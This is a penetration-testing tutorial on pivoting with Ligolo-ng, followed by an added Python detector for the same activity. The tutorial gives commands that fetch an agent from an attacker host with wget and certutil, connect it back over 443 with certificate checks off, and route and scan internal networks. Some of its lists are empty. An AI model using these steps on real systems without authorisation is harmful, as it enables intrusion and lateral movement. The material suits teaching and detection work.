
Unlock Hidden Networks: Tunneling and Pivoting

Hello folks,

Ever get that initial shell on a target, see another network segment you can't reach, and dread the hassle of setting up a pivot? What if I told you there's a better way?

Before discovering Ligolo-ng, I used proxychains for pivoting. While useful for application-level SOCKS tunneling, it has big limitations:

Ligolo-ng changes everything. It creates a virtual network interface that lets you pivot natively through a compromised machine—your whole toolkit works as if you're *inside* the new network.

What You Need to Know

Step 1: Download and Setup

1. Download the Tools from Ligolo-ng:

2. Prepare Your Attacker Machine

mkdir /opt/ligolo
cd /opt/ligolo

# Download or transfer files
tar -xvf ligolo-proxy.tar.gz
tar -xvf ligolo-agent.tar.gz

# Rename for convenience
mv proxy lin-proxy
mv agent lin-agent
  

Step 2: Start the Ligolo-ng Server (Proxy)

Create a virtual TUN interface on your attacker machine:

sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
  

Now start the proxy listener:

./lin-proxy -selfcert -laddr 0.0.0.0:443
  

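The -selfcert flag makes the proxy generate a temporary self-signed certificate automatically. Because that certificate is self-signed, the agent in Step 3 is run with -ignore-cert, which turns off certificate verification for the tunnel.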

Step 3: Deploying the First Agent (Linux Target)

1. Transfer the Agent

sudo python3 -m http.server 80  # On attacker

wget http://<YOUR-IP>/lin-agent   # On target
chmod +x lin-agent
  

2. Run the Agent

./lin-agent -connect <YOUR-IP>:443 -ignore-cert
  

Back on the proxy, you should see a new session appear. Activate it using:

session
start
  

Step 4: Discover Networks and Pivot

On the compromised machine, enumerate routes, connections and interfaces:

ip route
netstat -an
ifconfig
  

If you discover a network like 192.168.110.0/24, add it to your attacker machine:

sudo ip route add 192.168.110.0/24 dev ligolo
  

Now scan hosts as if you're in that network:

nmap -sV 192.168.110.50
  

Step 5: Pivoting Into a Windows Host

On the Windows target, discover new networks:

netstat -an | findstr "192.168."
  

Transfer the Windows agent:

certutil.exe -urlcache -split -f "http://<YOUR-IP>/win-agent.exe"
  

Run it:

win-agent.exe -connect <YOUR-IP>:443 -ignore-cert
  

Add the new route (e.g., 192.168.210.0/24) on your attacker machine:

sudo ip route add 192.168.210.0/24 dev ligolo
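
From the monitoring side, the agent transfer and launch in Steps 3 and 5 leave a recognizable trail in process-creation logs. The following is an added example, not part of the original post or the Ligolo-ng project: it flags the certutil download, the -connect/-ignore-cert argument pair, and any binary fetched over HTTP that later dials out from the same host. The record format, host names, rule names and sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

URL = re.compile(r"https?://[^\s\"']+")
CONNECT = re.compile(r"\s-connect\s+(\S+:\d+)")
DOWNLOADERS = {"wget", "curl", "certutil", "certutil.exe"}

def basename(path):
    """File name only, lowercased; handles both / and \\ separators."""
    return re.split(r"[\\/]", path.strip("\"'"))[-1].lower()

def detect(records):
    """records: (host, command_line) in time order -> [(host, rule, detail)]."""
    fetched, alerts = {}, []   # fetched: host -> {file name: source URL}
    for host, cmd in records:
        argv = cmd.split()     # simplification: no quoted paths with spaces
        if argv and argv[0] == "sudo":
            argv = argv[1:]
        if not argv:
            continue
        exe, url = basename(argv[0]), URL.search(cmd)
        if exe in DOWNLOADERS and url:
            name = basename(urlparse(url.group()).path)
            if name:
                fetched.setdefault(host, {})[name] = url.group()
            if exe.startswith("certutil") and "-urlcache" in cmd.lower():
                alerts.append((host, "certutil_download", url.group()))
        dial = CONNECT.search(cmd)
        if dial and "-ignore-cert" in argv:
            # Argument pair from the post; still matches if the binary is renamed.
            alerts.append((host, "tunnel_agent_args", dial.group(1)))
        if dial and exe in fetched.get(host, {}):
            # A file fetched over HTTP is now dialing out from the same host.
            alerts.append((host, "fetched_binary_dials_out", fetched[host][exe]))
    return alerts

# Constructed process-creation records (documentation IP range), not real logs.
SAMPLE = [
    ("web01", "wget http://198.51.100.7/lin-agent"),
    ("web01", "./lin-agent -connect 198.51.100.7:443 -ignore-cert"),
    ("ws07", 'certutil.exe -urlcache -split -f "http://198.51.100.7/win-agent.exe"'),
    ("ws07", "win-agent.exe -connect 198.51.100.7:443 -ignore-cert"),
    ("ws07", "certutil.exe -hashfile report.docx SHA256"),
    ("web01", "openssl s_client -connect example.org:443"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(*alert, sep=" | ")
```

The last two sample records are benign controls: a certutil hash check and an openssl client connection raise no alert.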
  

Summary

That's all I got for now!!
Regards, dr3amy
